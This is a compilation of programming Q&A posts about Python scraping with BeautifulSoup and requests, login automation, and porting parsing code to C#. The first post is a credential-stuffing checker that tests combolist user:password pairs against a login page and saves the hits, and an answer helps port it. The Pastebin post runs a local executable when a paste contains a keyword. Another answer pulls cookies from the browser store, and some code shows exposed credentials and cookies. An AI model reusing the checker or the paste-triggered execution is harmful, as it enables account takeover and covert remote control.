I want help finding the equivalent C# code for this Python script. Mainly, it's the BeautifulSoup and html.parser parts that I don't understand. Which libraries would I use in C#? I'd appreciate a demonstration with a code example. Thanks for all the help.
import urllib.parse
import urllib.request
import time
from bs4 import BeautifulSoup

result = "results.txt"  # output file for accepted combos; adjust the path as needed

def check_acc(user, password):
    data = "userLoginId={}&password={}&STAYIN=false&flow=websiteSignUp&mode=login&action=loginAction&withFields=STAYIN%2CnextPage%2CuserLoginId%2Cpassword%2CcountryCode%2CcountryIsoCode&authURL=authURL%2FEcpWPKhtag%3D&nextPage=&showPassword=&countryCode=%2B33&countryIsoCode=USA".format(user, password).encode("utf-8")
    request_login = urllib.request.Request(
        "https://www.mywebsitetest:8080/Admin",
        data=data,
        headers={
            'Host': 'www.mywebsitetest.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'fr-FR',
            'Accept-Encoding': 'gzip, deflate, br',
            'Referer': 'https://www.mywebsitetest/USA/Login',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': 330},
        unverifiable=True,
        method='POST')
    refused_msg = "{}Wrong combination</a>.".format('<a href="/">')
    try:
        response = urllib.request.urlopen(request_login)
        readed = response.read()
        soup = BeautifulSoup(readed, "html.parser")
        # find() returns the first matching element; findAll() returns a list, which has no .text
        IsTrue = str(soup.find("div", attrs={"class": "ui-message-contents"}).text)
        if IsTrue == refused_msg:
            print("Refused => ({}:{})".format(user, password))
        else:
            print("Accepted => ({}:{})".format(user, password))
            with open(result, "a") as result_file:
                result_file.write(user + ":" + password + "\n")
    except Exception as e:
        print(f"[-] Sorry, an error has occurred.\n=> {e}\n")
        print("[+] Closing program.\n")
        time.sleep(2)
        exit()

combo = "working.txt"
try:
    combo_file = open(combo, "r")
    print("[+] Combolist loaded.\n")
    for line in combo_file:
        user = line.split(":")[0]
        password = line.split(":")[1].strip()
        check_acc(user, password)
except FileNotFoundError:
    print("[-] Nothing found.")
    print("[+] Bye!...\n")
    time.sleep(20)
    exit()
The Html Agility Pack is one of the most common HTML parsing packages used in C#. It is available via direct download or from the NuGet package feed, and its documentation is available online. You should also get the CssSelectors NuGet package so you can use CSS selectors to extract elements from the DOM.
To get your div with the ui-message-contents class you will do something like:
// You will need to pass in/configure the headers and other fields for your request before you call GetResponse
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();

// Parse the response body with the Html Agility Pack
HtmlDocument document = new HtmlAgilityPack.HtmlDocument();
document.Load(response.GetResponseStream());

// Requires the CssSelectors package mentioned above
IList<HtmlNode> elements = document.QuerySelectorAll("div.ui-message-contents");
// or, if you're only expecting a single result
HtmlNode element = document.QuerySelector("div.ui-message-contents");
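A side note on the request half: HttpWebRequest works, but on newer .NET versions you can swap in HttpClient and hand its response stream straight to HtmlDocument.Load, since Load accepts any Stream. The parsing code above stays the same either way.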
from bs4 import BeautifulSoup
import requests

searchresults = []
search = 'seo'
url = 'https://www.google.com/search'
headers = {
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82',
}
parameters = {'q': search}
content = requests.get(url, headers=headers, params=parameters).text
soup = BeautifulSoup(content, 'html.parser')
search = soup.find(id='search')
first_link = search.find('a')
searchresults.append(first_link['href'])
for i, j in enumerate(searchresults):
    print(searchresults[i])
How do I return the whole list of search result URLs? I would later like to add multiple pages so I can index all the URLs.
If you want to get all the links from the search result, replace your code after search = soup.find(id = 'search'):
a_tags = search.find_all('a', href=True)
searchresults = [i['href'] for i in a_tags]
for i, j in enumerate(searchresults):
    print(j)
Your code currently gives only one link because you are using search.find('a'), which returns just the first result, instead of search.find_all('a', href=True), which returns all the a tags that have an href.
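Since you mention wanting to cover multiple pages later: below is a rough sketch of paging, assuming Google's standard start offset parameter (0, 10, 20, ...). Treat it as a starting point only; Google changes its markup and rate-limits scrapers, so the search container can come back empty.

import requests
from bs4 import BeautifulSoup

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82',
}

searchresults = []
for page in range(3):  # first three result pages
    parameters = {'q': 'seo', 'start': page * 10}  # start = result offset
    content = requests.get('https://www.google.com/search', headers=headers, params=parameters).text
    soup = BeautifulSoup(content, 'html.parser')
    search = soup.find(id='search')
    if search is None:  # blocked, captcha page, or markup change
        break
    searchresults.extend(a['href'] for a in search.find_all('a', href=True))

for link in searchresults:
    print(link)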
I am scraping data from the Rakuten Japanese e-commerce website, using requests-html and Beautiful Soup.
The problem is that when I request from my local PC (127.0.0.1) it works fine, but when I request from my EC2 server I get the message Reference #<esi:vars name="AKAMAI_DEBUG_STRING"/> and no data or HTML page is found. On the other hand, when I fetch the same page URL from the server with wget, I get the full page; it is only my script that doesn't work.
Here is my code sample:
from bs4 import BeautifulSoup
from requests_html import HTMLSession

def get_search_url(query_keyword):
    base_url = 'https://search.rakuten.co.jp/search/mall/'
    headers = {
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
    }
    session = HTMLSession()
    session.headers.update(headers)
    request_url = base_url + query_keyword
    resp = session.get(request_url)
    soup = BeautifulSoup(resp.text, "lxml")
    return soup

def feature_product_details(url):
    output_list = []
    for i in url.find_all("div", attrs={"class": "dui-card searchresultitem"}):
        product_title = i.find("div", attrs={"class": "content title"})
        if product_title is not None:
            product_title = product_title.getText()
        else:
            product_title = ""
        output = {
            'title': product_title,
        }
        output_list.append(output)
    print(output_list)
    return output_list

def main_rakuten_product_search(query):
    query_keyword = query
    page = get_search_url(query_keyword)
    product_lists = feature_product_details(page)
    return product_lists

if __name__ == '__main__':
    queries = '【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース '
    main_rakuten_product_search(queries)
Sample output when running on my local machine:
[
    {
        "title": "【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース リレーアタック対策 ボックス 箱 電波遮断ケース RFIDブロッキング 高級PUレザー 高級車盗難防止 カーセキュリティ 高級感溢れ レクサス(グレー)"
    }
]
But I don't get any response when running it on my server; it just shows this message: Reference #<esi:vars name="AKAMAI_DEBUG_STRING"/>
If anyone has any idea how this could be solved, I would be grateful to hear it.
I've tried your code on an EC2 in ap-northeast-1 (Tokyo) and I'm getting the sample output.
So, here are a few things to check:
make sure your EC2 has the right ports open
double check the headers (I've modified yours a bit - see code below)
check your query input; maybe some of them are malformed?
don't spray the rakuten server with too many requests from one EC2; maybe they're blocking you already
Here's your code after some slight tuning:
from bs4 import BeautifulSoup
from requests_html import HTMLSession

def get_search_url(query_keyword):
    base_url = 'https://search.rakuten.co.jp/search/mall/'
    headers = {
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',
        'referer': 'https://www.rakuten.co.jp/'
    }
    session = HTMLSession()
    session.headers.update(headers)
    return BeautifulSoup(session.get(base_url + query_keyword).content, "lxml")

def feature_product_details(url):
    output_list = []
    for i in url.find_all("div", attrs={"class": "dui-card searchresultitem"}):
        product_title = i.find("div", attrs={"class": "content title"})
        if product_title is not None:
            product_title = product_title.getText()
        else:
            product_title = ""
        output_list.append({'title': product_title})
    return output_list

def main_rakuten_product_search(query):
    return feature_product_details(get_search_url(query))

if __name__ == '__main__':
    queries = '【レビュー特典中】スマートキー 電波遮断ケース 電波遮断ボックス リレーアタック防止用 キーケース '
    print(main_rakuten_product_search(queries))
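On the last point: if you end up looping over many queries, a simple pause between requests is the cheapest way to avoid being blocked. A minimal sketch (the query list here is made up, and the two-second delay is an arbitrary starting value, not a documented Rakuten limit):

import time

queries = ['スマートキー ケース', '電波遮断 ボックス']  # hypothetical examples
for q in queries:
    print(main_rakuten_product_search(q))
    time.sleep(2)  # pause so you don't hammer the server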
I am trying to log in to my Pastebin account automatically using Python, but I'm failing and I don't know why. I copied the request headers exactly and double-checked them, but I am still greeted with an HTTP 400 code. Can somebody help me?
This is my code:
import requests
from bs4 import BeautifulSoup
import subprocess
import os
import sys
from requests import Session

# the actual program
page = requests.get("https://pastebin.com/99qQTecB")
parse = BeautifulSoup(page.content, 'html.parser')
string = parse.find("textarea")
command = 'hello'
###########################################################
URL = 'https://pastebin.com'
LOGIN_ROUTE = '/login'

d = requests.session()
cfduid = d.get(URL).cookies['__cfduid']
e = requests.session()
csrf = e.get(URL).cookies['_csrf-frontend']
f = requests.session()
pastebin = f.get(URL).cookies['pastebin-frontend']
print(csrf)
print(cfduid)
print(pastebin)

HEADERS = {'Host': 'pastebin.com',
           'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Accept-Encoding': 'gzip, deflate, br',
           'Referer': 'https://pastebin.com/login',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Content-Length': '174',
           'Connection': 'keep-alive',
           'Cookie': "__cfduid=" + cfduid + ";",
           '_csrf-frontend': csrf + ";",
           'pastebin-frontend': pastebin + ";",
           'Upgrade-Insecure-Requests': '1'}

if command in string:
    subprocess.call('/super_mario_bros.exe', shell=True)
    s = requests.session()
    csrf_token = s.get(URL).cookies['_csrf-frontend']
    login_payload = {
        'LoginForm[username]': 'SECRET',
        'LoginForm[password]': 'Secret',
        '_csrf-frontend': csrf_token
    }
    # Actual login
    login_req = s.post(URL + LOGIN_ROUTE, data=login_payload)
    print(csrf_token)
    print(login_req.status_code)
else:
    print("smth")
#print(string)
#Cookie: __cfduid=d955068eb3316226875aa037c059fd8f11595841495; __gads=ID=49ab9fcccba85989:T=1595841504:S=ALNI_MYT-PJZzkGrbYunHFHQE-EEw3vfhQ; _ga=GA1.2.1839432134.1595810341; pastebin-frontend=a9bf2e8c462237148c2d5f6b0832387c; _csrf-frontend=8213fdd4c42f9cfad45ed4993a25a1753c3539b1700c9e92be8ffac00780e34ea%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22HHm8aNkQL8XAG8joV8KfCZqOTls50yyW%22%3B%7D; _gid=GA1.2.1476917794.1596212111
I am really exhausted, because I've been trying to make this work for the last couple of hours, but the 400 code is still there. Thank you in advance!
I can recommend browser_cookie3:
import browser_cookie3
import requests
from bs4 import BeautifulSoup

cj = browser_cookie3.load()
s = requests.Session()
for c in cj:
    if 'pastebin' in str(c):
        s.cookies.set_cookie(c)
r = s.get('https://pastebin.com/')
soup = BeautifulSoup(r.content, 'lxml')
print(soup.select_one('div.header__user-name').text)
prints:
UWTD
This code takes the session cookies from the browser (where you are already logged in) and reuses them, then prints the username of the logged-in user.
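As for why your original script returns 400: you create four separate requests.session() objects, so the _csrf-frontend cookie you send belongs to a different session than the token you post, and they can never match. If you would rather stay with plain requests, here is a minimal single-session sketch. I'm assuming the login form carries a hidden input named _csrf-frontend, matching the field name in your payload; verify that against the live page.

import requests
from bs4 import BeautifulSoup

s = requests.Session()
login_page = s.get('https://pastebin.com/login')  # sets all cookies on this one session
soup = BeautifulSoup(login_page.content, 'html.parser')
# assumed hidden input name; check the live form if this comes back None
token = soup.find('input', {'name': '_csrf-frontend'})['value']

login_payload = {
    'LoginForm[username]': 'SECRET',
    'LoginForm[password]': 'Secret',
    '_csrf-frontend': token,
}
login_req = s.post('https://pastebin.com/login', data=login_payload)
print(login_req.status_code)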
I'm writing an application which needs to communicate with an ASP.NET website that doesn't have an API.
I'm using Python 3.5.2 with Requests 2.18.4 to achieve my purpose.
The problem is that the site uses __doPostBack(), so I achieved my goal using Selenium, but it was slow and opened a browser for every request I wanted to make.
First I analyzed the POST data sent to the website for login using BurpSuite. It contained some hidden fields from the page HTML, plus the username, password, captcha, and a radio button value.
A successful login attempt returns a 302 HTTP response code and redirects the browser to the profile page.
I extract the hidden fields, fetch the captcha image and enter it manually myself, and POST the data to the website, but it returns a 200 response saying an error occurred.
This is the Code:
import re
import requests
from urllib.request import urlretrieve
from collections import OrderedDict
from bs4 import BeautifulSoup as BS
from PIL import Image

def get_and_show_captcha(response):
    soup = BS(response.text, "html.parser")
    image_url = soup.find("img", {"id": 'RadCaptcha1_CaptchaImageUP'})["src"]
    Image.open(urlretrieve(base_url + image_url)[0]).show()

base_url = 'http://example.com/'
section_login = 'login.aspx'

proxies = {
    'http': 'http://127.0.0.1:8080',
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
    'DNT': '1',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Upgrade-Insecure-Requests': '1',
}

session = requests.Session()
session.headers.update(headers)

r = session.get('http://example.com/login.aspx', proxies=proxies)

login_post_dict = OrderedDict()
login_post_dict['__EVENTTARGET'] = ''
login_post_dict['__EVENTARGUMENT'] = ''
login_post_dict['__VIEWSTATE'] = ''
login_post_dict['__VIEWSTATEGENERATOR'] = ''
login_post_dict['__PREVIOUSPAGE'] = ''
login_post_dict['__EVENTVALIDATION'] = ''
login_post_dict['txtUserName'] = 'USERNAME'
login_post_dict['txtPassword'] = 'PASSWORD'

get_and_show_captcha(response=r)
captcha = input('CAPTCHA: ')
login_post_dict['rcTextBox1'] = captcha
login_post_dict['RadCaptcha1_ClientState'] = ''
login_post_dict['SOMERADIO'] = 'RADIOBUTTON'
login_post_dict['btn_enter'] = 'ENTER'
login_post_dict['txtUserName2'] = ''
login_post_dict['txt_email'] = ''

soup = BS(r.text, 'html.parser')
capture_id = re.compile(r'id="(\w*)"')
capture_value = re.compile(r'value="(.*)"')
# fill in the values of the hidden inputs scraped from the login page
for html_input in soup.find_all('input', attrs={'type': 'hidden'}):
    for hidden_id in capture_id.findall(str(html_input)):
        if hidden_id != "RadCaptcha1_ClientState":
            login_post_dict[hidden_id] = ''
    for hidden_id_value in capture_value.findall(str(html_input)):
        if hidden_id_value == '':
            continue
        login_post_dict[hidden_id] = hidden_id_value

session.headers.update({'Referer': base_url + section_login})
print(login_post_dict)
session.post(base_url + section_login, data=login_post_dict, proxies=proxies)
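One thing worth checking while debugging: requests follows redirects by default, so even a successful login (the 302 described above) would surface as a final 200 here. To see the raw status of the POST itself, a small sketch using requests' allow_redirects flag with the same names as the script above:

# keep a successful 302 visible instead of following the redirect
resp = session.post(base_url + section_login, data=login_post_dict,
                    proxies=proxies, allow_redirects=False)
print(resp.status_code, resp.headers.get('Location'))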
I send the script's data through BurpSuite in order to see exactly what's being sent.
Any solution?
I feel puzzled.
My idea is to send a request to the URL, extract the POST data from the web page, and then send it back to the page. When I used urllib.request in Python, I failed; but when I used requests instead, it worked!
Please tell me why.
Here is the code; the commented-out lines are the urllib.request version.
import urllib.request
import http.cookiejar
import re
import requests

loginUrl = 'https://passport.csdn.net/account/login?from=http://my.csdn.net/my/mycsdn'

# Here is the urllib.request code
#cookies = http.cookiejar.MozillaCookieJar()
#handler = urllib.request.HTTPCookieProcessor(cookies)
#opener = urllib.request.build_opener(handler)

headers = {
    'Origin': 'http://passport.csdn.net',
    'Referer': 'http://passport.csdn.net/account/login?from=http%3A%2F%2Fmy.csdn.net%2Fmy%2Fmycsdn',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 LBBROWSER'
}

# Here is the requests code
s = requests.Session()
data = s.get(loginUrl)
data = data.text
#request = urllib.request.Request(loginUrl)
#response = urllib.request.urlopen(request)
#data = response.read().decode('utf-8')

# get the values of lt and execution from the web page
pattern_lt = re.compile('<input type="hidden" name="lt" value="(.*?)" />', re.S)
lt = re.findall(pattern_lt, data)
lt = lt[0]
pattern_exe = re.compile('<input type="hidden" name="execution" value="(.*?)" />', re.S)
exe = re.findall(pattern_exe, data)
exe = exe[0]

postDict = {
    'username': 'qinyufeng_hdq#163.com',
    'password': 'csdn690076598',
    'lt': lt,
    'execution': exe,
    '_eventId': 'submit'
}

r = s.post(loginUrl, data=postDict)
#postData = urllib.parse.urlencode(postDict).encode()
#request = urllib.request.Request(loginUrl, postData, headers)
#response = opener.open(request)
#data = response.read().decode('UTF-8')
print(r.text)
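My only guess is that cookies are the difference: the commented-out version fetches the login page with urllib.request.urlopen, which uses the default opener and never touches the cookie jar, while requests.Session carries cookies automatically. A sketch of what I mean (untested), with both calls going through the same opener, reusing loginUrl and headers from above:

import http.cookiejar
import re
import urllib.parse
import urllib.request

cookies = http.cookiejar.MozillaCookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookies))

# GET through the opener, so the login page's cookies land in the jar
data = opener.open(loginUrl).read().decode('utf-8')
lt = re.findall('<input type="hidden" name="lt" value="(.*?)" />', data, re.S)[0]
exe = re.findall('<input type="hidden" name="execution" value="(.*?)" />', data, re.S)[0]

postDict = {'username': 'qinyufeng_hdq#163.com', 'password': 'csdn690076598',
            'lt': lt, 'execution': exe, '_eventId': 'submit'}
postData = urllib.parse.urlencode(postDict).encode()
request = urllib.request.Request(loginUrl, postData, headers)
# POST through the same opener, so the jar's cookies are sent back
data = opener.open(request).read().decode('utf-8')
print(data)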
I'm not good at English, but I hope you get my idea. Thank you for reading my question!